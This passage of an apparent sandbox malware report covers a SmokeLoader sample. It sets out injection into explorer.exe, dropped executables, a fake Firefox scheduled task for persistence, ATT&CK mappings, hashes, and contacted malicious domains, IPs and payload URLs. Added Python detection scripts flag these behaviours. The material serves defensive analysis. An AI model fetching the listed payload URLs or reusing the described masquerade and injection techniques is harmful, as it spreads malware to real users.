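            findings.append(("explorer_dropped_pe", ev["path"]))
        elif (ev["id"] == 8 and is_explorer(ev["target"])
              and USER_PROFILE.match(ev["source"])):
            findings.append(("remote_thread_into_explorer", ev["source"]))
    return findings


def rule_counts(findings):
    counts = {}
    for rule, _ in findings:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


# Constructed telemetry modelled on the report's evidence, plus two benign controls.
EVENTS = [
    {"id": 8, "source": r"C:\Users\user\Desktop\UZ6FEqlix4.exe",
     "target": r"C:\Windows\explorer.exe", "start_address": "0x4F41930"},
    {"id": 11, "image": r"C:\Windows\explorer.exe",
     "path": r"C:\Users\user\AppData\Local\Temp\411F.exe", "magic": "MZ"},
    {"id": 11, "image": r"C:\Windows\explorer.exe",
     "path": r"C:\Users\user\AppData\Roaming\eveggtb", "magic": "MZ"},
    {"id": 3, "image": r"C:\Windows\explorer.exe",
     "dst_ip": "185.233.81.115", "dst_port": 443, "dst_host": ""},
    {"id": 3, "image": r"C:\Windows\explorer.exe",
     "dst_ip": "54.38.220.85", "dst_port": 80, "dst_host": "unicupload.top"},
    # Control: explorer.exe reaching an address the sandbox itself whitelisted.
    {"id": 3, "image": r"C:\Windows\explorer.exe",
     "dst_ip": "13.107.42.16", "dst_port": 443, "dst_host": ""},
    # Control: a browser writing a non-PE temp file.
    {"id": 11, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\user\AppData\Local\Temp\scoped_dir\blob.tmp", "magic": "\x00\x00"},
]

if __name__ == "__main__":
    for rule, detail in triage(EVENTS):
        print(f"{rule:28s} {detail}")
```

The two strong rules (remote thread from a user-directory binary into explorer.exe, explorer.exe writing an MZ file into %APPDATA% or %TEMP%) stand on their own; the network rule is only high-confidence when it hits the indicator lists, because explorer.exe legitimately makes outbound connections.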

            Stealing of Sensitive Information:

            Yara detected SmokeLoader
            Source: Yara match, File source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected SmokeLoader
            Source: Yara match, File source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            (Trailing digits on a technique are the report's signature-count badges, kept as printed; an empty cell means the matrix template has no entry in that column for that row.)

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Native API 1 | DLL Side-Loading 1 | Process Injection 313 | Masquerading 11 | Input Capture 1 | System Time Discovery 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Exploitation for Client Execution 1 | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Virtualization/Sandbox Evasion 12 | LSASS Memory | Security Software Discovery 431 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 313 | Security Account Manager | Virtualization/Sandbox Evasion 12 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 125 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Hidden Files and Directories 1 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | File and Directory Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 | DCSync | System Information Discovery 15 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

            Behavior Graph

            Behavior Graph ID: 545931, Sample: UZ6FEqlix4, Start date: 28/12/2021, Architecture: WINDOWS, Score: 100

            Top-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Antivirus detection for URL or domain; 5 other signatures. Top-level domain: host-data-coin-11.com

            Process tree as drawn in the graph:

            UZ6FEqlix4.exe (started)
              - UZ6FEqlix4.exe (child)
                  signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration)
                  - explorer.exe (injected)
                      network: 185.233.81.115 port 443 (local port 49800), SUPERSERVERSDATACENTERRU, Russian Federation; unicupload.top 54.38.220.85 port 80 (local port 49859), OVHFR, France; 6 other IPs or domains
                      dropped: C:\Users\user\AppData\Roaming\eveggtb (PE32); C:\Users\user\AppData\Local\Temp\411F.exe (PE32); C:\Users\user\...\eveggtb:Zone.Identifier (ASCII)
                      signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
                      - 411F.exe (started)
                          signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                          - 411F.exe (child)
                              signatures: Checks if the current machine is a virtual machine (disk enumeration)
            eveggtb (started)
                signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
              - eveggtb (child)
                  signatures: Creates a thread in another existing process (thread injection)


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            UZ6FEqlix4.exe | 58% | Virustotal |
            UZ6FEqlix4.exe | 20% | Metadefender |
            UZ6FEqlix4.exe | 63% | ReversingLabs | Win32.Trojan.Raccrypt
            UZ6FEqlix4.exe | 100% | Joe Sandbox ML |

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\eveggtb | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\411F.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\411F.exe | 20% | Metadefender |
            C:\Users\user\AppData\Local\Temp\411F.exe | 67% | ReversingLabs | Win32.Trojan.Raccrypt
            C:\Users\user\AppData\Roaming\eveggtb | 20% | Metadefender |
            C:\Users\user\AppData\Roaming\eveggtb | 67% | ReversingLabs | Win32.Trojan.Raccrypt

            Unpacked PE Files

            Source | Detection | Scanner | Label
            11.2.eveggtb.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.2.UZ6FEqlix4.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            20.2.411F.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            11.0.eveggtb.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            11.1.eveggtb.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.0.UZ6FEqlix4.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.0.UZ6FEqlix4.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            19.2.411F.exe.4e15a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            0.2.UZ6FEqlix4.exe.5b15a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            11.0.eveggtb.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.0.UZ6FEqlix4.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            20.0.411F.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            11.0.eveggtb.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.1.UZ6FEqlix4.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            9.2.eveggtb.4e15a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            20.0.411F.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            20.0.411F.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            20.1.411F.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

            Domains

            Source | Detection | Scanner | Label
            unicupload.top | 15% | Virustotal |
            host-data-coin-11.com | 14% | Virustotal |

            URLs

            Source | Detection | Scanner | Label
            http://host-data-coin-11.com/ | 0% | URL Reputation | safe
            http://file-coin-host-12.com/ | 0% | URL Reputation | safe
            http://data-host-coin-8.com/files/5376_1640094939_1074.exe | 0% | Avira URL Cloud | safe
            http://unicupload.top/install5.exe | 100% | URL Reputation | phishing
            http://privacytools-foryou-777.com/downloads/toolspab3.exe | 100% | Avira URL Cloud | malware

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            unicupload.top | 54.38.220.85 | true | true | | unknown
            host-data-coin-11.com | 47.251.11.252 | true | true | | unknown
            privacytools-foryou-777.com | 47.251.11.252 | true | true | | unknown
            data-host-coin-8.com | 47.251.11.252 | true | true | | unknown
            infinity-cheats.com | unknown | unknown | true | | unknown

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://host-data-coin-11.com/ | true | URL Reputation: safe | unknown
            http://file-coin-host-12.com/ | true | URL Reputation: safe | unknown
            http://data-host-coin-8.com/files/5376_1640094939_1074.exe | false | Avira URL Cloud: safe | unknown
            http://unicupload.top/install5.exe | true | URL Reputation: phishing | unknown
            http://privacytools-foryou-777.com/downloads/toolspab3.exe | true | Avira URL Cloud: malware | unknown

            Contacted IPs

            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            185.233.81.115 | unknown | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | true
            47.251.11.252 | host-data-coin-11.com | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
            185.186.142.166 | unknown | Russian Federation | 204490 | ASKONTELRU | true
            54.38.220.85 | unicupload.top | France | 16276 | OVHFR | true

            Private

            IP
            192.168.2.1

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:545931
                  Start date:28.12.2021
                  Start time:13:53:06
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 7m 22s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:UZ6FEqlix4 (renamed file extension from none to exe)
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of new started processes analysed:20
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@9/3@24/5
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 88.3% (good quality ratio 60%)
                  • Quality average: 52.3%
                  • Quality standard deviation: 40.9%
                  HCA Information:
                  • Successful, ratio: 54%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  Warnings:
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • TCP Packets have been reduced to 100
                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.5.88, 13.107.42.16, 23.213.170.60, 92.122.145.220
                  • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, client-office365-tas.msedge.net, afdo-tas-offload.trafficmanager.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, ris.api.iris.microsoft.com, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, e12564.dspb.akamaiedge.net, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, e16646.dscg.akamaiedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com, storeedgefd.dsx.mp.microsoft.com

                  Simulations

                  Behavior and APIs

                  Time | Type | Description
                  13:54:47 | Task Scheduler | Run new task: Firefox Default Browser Agent B8BE4ECA53B9BE33 path: C:\Users\user\AppData\Roaming\eveggtb
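The persistence recorded here is a scheduled task whose name copies the pattern Mozilla uses for its own "Firefox Default Browser Agent <16 hex digits>" task, while the action points at an extensionless file in %APPDATA%. The check below is an added example, not Joe Sandbox or SmokeLoader code: it parses the CSV that `schtasks /query /fo CSV /v` prints (the column names "TaskName" and "Task To Run" are that tool's), scores each task, and reports the masquerades. SAMPLE_CSV is constructed; the expected location and command line of the genuine Firefox agent binary are assumptions for illustration and should be adjusted to what is actually installed on the estate.

```python
"""Flag scheduled tasks that borrow a vendor task name but run something else.
Added example, not Joe Sandbox or SmokeLoader code."""
import csv
import io
import re

# Vendor task-name families that malware borrows, mapped to the action that the
# genuine task runs (assumption: default Firefox install path, 32- or 64-bit).
KNOWN_FAMILIES = {
    re.compile(r"^\\?Firefox Default Browser Agent [0-9A-F]{16}$", re.I):
        re.compile(r'^"?C:\\Program Files( \(x86\))?\\Mozilla Firefox\\default-browser-agent\.exe', re.I),
}
# Assumption: default profile layout; anything under AppData is user-writable.
USER_WRITABLE = re.compile(r'^"?C:\\Users\\[^\\]+\\AppData\\', re.I)


def action_binary(task_to_run):
    """First token of the action string, handling a quoted or a bare path."""
    t = task_to_run.strip()
    if t.startswith('"'):
        return t[1:t.find('"', 1)]
    return t.split(" ", 1)[0]


def assess_task(name, task_to_run):
    """Reasons a task looks like a masquerade; an empty list means clean."""
    reasons = []
    binary = action_binary(task_to_run)
    for name_pat, expected_action in KNOWN_FAMILIES.items():
        if name_pat.match(name) and not expected_action.match(task_to_run):
            reasons.append("vendor task name but action is not the vendor binary")
    if USER_WRITABLE.match(binary):
        reasons.append("action lives under a user-writable AppData path")
    if "." not in binary.rsplit("\\", 1)[-1]:
        reasons.append("action has no file extension")
    return reasons


def scan_schtasks_csv(text):
    """Map TaskName -> reasons for every listed task that is not clean."""
    verdicts = {}
    for row in csv.DictReader(io.StringIO(text)):
        reasons = assess_task(row["TaskName"], row["Task To Run"])
        if reasons:
            verdicts[row["TaskName"]] = reasons
    return verdicts


# Constructed output in the shape of `schtasks /query /fo CSV /v` (columns trimmed):
# the task from this report, a genuine-looking Firefox task, and a Windows task.
SAMPLE_CSV = '''"HostName","TaskName","Status","Task To Run","Author"
"HOST","\\Firefox Default Browser Agent B8BE4ECA53B9BE33","Ready","C:\\Users\\user\\AppData\\Roaming\\eveggtb","user"
"HOST","\\Firefox Default Browser Agent 308046B0AF4A39CB","Ready","""C:\\Program Files\\Mozilla Firefox\\default-browser-agent.exe"" do-task ""308046B0AF4A39CB""","Mozilla"
"HOST","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","Ready","%windir%\\system32\\defrag.exe -c -h -o -$","Microsoft"
'''

if __name__ == "__main__":
    for task, reasons in scan_schtasks_csv(SAMPLE_CSV).items():
        print(task)
        for r in reasons:
            print("   -", r)
```

On a live host, feed `schtasks /query /fo CSV /v` output to scan_schtasks_csv; the name-format check alone is not enough, since the sample reproduces the 16-hex-digit suffix exactly, which is why the verdict also weighs where the action binary lives and whether it carries an extension.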

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\411F.exe
                  Process:C:\Windows\explorer.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):339456
                  Entropy (8bit):6.210575483974104
                  Encrypted:false
                  SSDEEP:6144:XFOSX78eVzsodTr6rv6acPyCmyD3+KHZc9FOKV:XvX77wo6rv6acPbmyDP5c9x
                  MD5:5E0ED8966761E70EE0B8DCD141AAFB4C
                  SHA1:933E68212D0F6D029E920BD93E5DCA7CA5BDCB7A
                  SHA-256:8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
                  SHA-512:D692905DDD5B1EA92ABED7FD38379947A9B453F5AEDEE91C5BE217E1799CC2B03C898FD99828EFA15A58C7811781DB8CBC90F5330640BF9361F60422DF22EB33
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Metadefender, Detection: 20%
                  • Antivirus: ReversingLabs, Detection: 67%
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L.....e`..................... .......=............@..........................@..................................................(........b......................$!..p...................................@............................................text...N........................... ..`.data...ho..........................@....pejevu......p.......~..............@....dozi...............................@....rsrc....b.......d..................@..@.reloc...;.......<..................@..B........................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Roaming\eveggtb
                  Process:C:\Windows\explorer.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):339456
                  Entropy (8bit):6.210575483974104
                  Encrypted:false
                  SSDEEP:6144:XFOSX78eVzsodTr6rv6acPyCmyD3+KHZc9FOKV:XvX77wo6rv6acPbmyDP5c9x
                  MD5:5E0ED8966761E70EE0B8DCD141AAFB4C
                  SHA1:933E68212D0F6D029E920BD93E5DCA7CA5BDCB7A
                  SHA-256:8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
                  SHA-512:D692905DDD5B1EA92ABED7FD38379947A9B453F5AEDEE91C5BE217E1799CC2B03C898FD99828EFA15A58C7811781DB8CBC90F5330640BF9361F60422DF22EB33
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Metadefender, Detection: 20%
                  • Antivirus: ReversingLabs, Detection: 67%
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L.....e`..................... .......=............@..........................@..................................................(........b......................$!..p...................................@............................................text...N........................... ..`.data...ho..........................@....pejevu......p.......~..............@....dozi...............................@....rsrc....b.......d..................@..@.reloc...;.......<..................@..B........................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Roaming\eveggtb:Zone.Identifier
                  Process:C:\Windows\explorer.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Preview: [ZoneTransfer]....ZoneId=0

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.210575483974104
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:UZ6FEqlix4.exe
                  File size:339456
                  MD5:5e0ed8966761e70ee0b8dcd141aafb4c
                  SHA1:933e68212d0f6d029e920bd93e5dca7ca5bdcb7a
                  SHA256:8bbdda1786e15a568a573a2f38762e95de138af969e0a13b96d7086aaa98bfc2
                  SHA512:d692905ddd5b1ea92abed7fd38379947a9b453f5aedee91c5be217e1799cc2b03c898fd99828efa15a58c7811781db8cbc90f5330640bf9361f60422df22eb33
                  SSDEEP:6144:XFOSX78eVzsodTr6rv6acPyCmyD3+KHZc9FOKV:XvX77wo6rv6acPbmyDP5c9x
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L.....e`..................... .....

                  File Icon

                  Icon Hash:b2e8e8e8aaa2a488

                  Static PE Info

                  General

                  Entrypoint:0x423db0
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x6065B41B [Thu Apr 1 11:52:59 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:39de84e7a601fa8861e0e6a8c8b0a138

                  Entrypoint Preview

                  Instruction
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  call 00007FBB8105AEABh
                  call 00007FBB81052586h
                  pop ebp
                  ret
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  push FFFFFFFEh
                  push 0043E6E0h
                  push 004275F0h
                  mov eax, dword ptr fs:[00000000h]
                  push eax
                  add esp, FFFFFF98h
                  push ebx
                  push esi
                  push edi
                  mov eax, dword ptr [00447B80h]
                  xor dword ptr [ebp-08h], eax
                  xor eax, ebp
                  push eax
                  lea eax, dword ptr [ebp-10h]
                  mov dword ptr fs:[00000000h], eax
                  mov dword ptr [ebp-18h], esp
                  mov dword ptr [ebp-70h], 00000000h
                  lea eax, dword ptr [ebp-60h]
                  push eax
                  call dword ptr [00401228h]
                  cmp dword ptr [004C6F4Ch], 00000000h
                  jne 00007FBB81052580h
                  push 00000000h
                  push 00000000h
                  push 00000001h
                  push 00000000h
                  call dword ptr [00401224h]
                  call 00007FBB81052703h
                  mov dword ptr [ebp-6Ch], eax
                  call 00007FBB81056CBBh
                  test eax, eax
                  jne 00007FBB8105257Ch
                  push 0000001Ch
                  call 00007FBB810526C0h
                  add esp, 04h
                  call 00007FBB810580B8h
                  test eax, eax
                  jne 00007FBB8105257Ch
                  push 00000010h
                  call 00007FBB810526ADh
                  add esp, 04h
                  push 00000001h
                  call 00007FBB81051823h
                  add esp, 04h
                  call 00007FBB8105A02Bh
                  mov dword ptr [ebp-04h], 00000000h
                  call 00007FBB8105B80Fh
                  test eax, eax

                  Rich Headers

                  Programming Language:
                  • [LNK] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [C++] VS2010 build 30319
                  • [RES] VS2010 build 30319
                  • [IMP] VS2008 SP1 build 30729

                  Data Directories

                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3ebcc | 0x28 | .text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc9000 | 0x6288 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd0000 | 0x2124 | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1370 | 0x1c | .text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa5b8 | 0x40 | .text
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x2e8 | .text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                  Sections

                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x3ed4e | 0x3ee00 | False | 0.565722850398 | data | 6.87583252941 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .data | 0x40000 | 0x86f68 | 0x8c00 | False | 0.0388950892857 | data | 0.690472674069 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .pejevu | 0xc7000 | 0x5 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .dozi | 0xc8000 | 0xd93 | 0xe00 | False | 0.00697544642857 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc | 0xc9000 | 0x6288 | 0x6400 | False | 0.481875 | data | 5.03814907839 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc | 0xd0000 | 0x3bee | 0x3c00 | False | 0.449674479167 | data | 4.58044690622 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  Name | RVA | Size | Type | Language | Country
                  RT_CURSOR | 0xcca90 | 0x130 | data | Divehi; Dhivehi; Maldivian | Maldives
                  RT_CURSOR | 0xccbd8 | 0x130 | data | Divehi; Dhivehi; Maldivian | Maldives
                  RT_CURSOR | 0xccd08 | 0xf0 | data | Divehi; Dhivehi; Maldivian | Maldives
                  RT_CURSOR | 0xccdf8 | 0x10a8 | dBase III DBT, version number 0, next free block index 40 | Divehi; Dhivehi; Maldivian | Maldives
                  RT_CURSOR | 0xcded0 | 0x8a8 | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317" | Divehi; Dhivehi; Maldivian | Maldives
                  RT_ICON | 0xc95a0 | 0x8a8 | data | Spanish | Colombia
                  RT_ICON | 0xc9e48 | 0x6c8 | data | Spanish | Colombia
                  RT_ICON | 0xca510 | 0x568 | GLS_BINARY_LSB_FIRST | Spanish | Colombia
                  RT_ICON | 0xcaa78 | 0x10a8 | data | Spanish | Colombia
                  RT_ICON | 0xcbb20 | 0x988 | data | Spanish | Colombia
                  RT_ICON | 0xcc4a8 | 0x468 | GLS_BINARY_LSB_FIRST | Spanish | Colombia
                  RT_STRING | 0xce790 | 0x72 | data | Divehi; Dhivehi; Maldivian | Maldives
                  RT_STRING | 0xce808 | 0x256 | data | Divehi; Dhivehi; Maldivian | Maldives
                  RT_STRING | 0xcea60 | 0x794 | data | Divehi; Dhivehi; Maldivian | Maldives
                  RT_STRING | 0xcf1f8 | 0x90 | data | Divehi; Dhivehi; Maldivian | Maldives
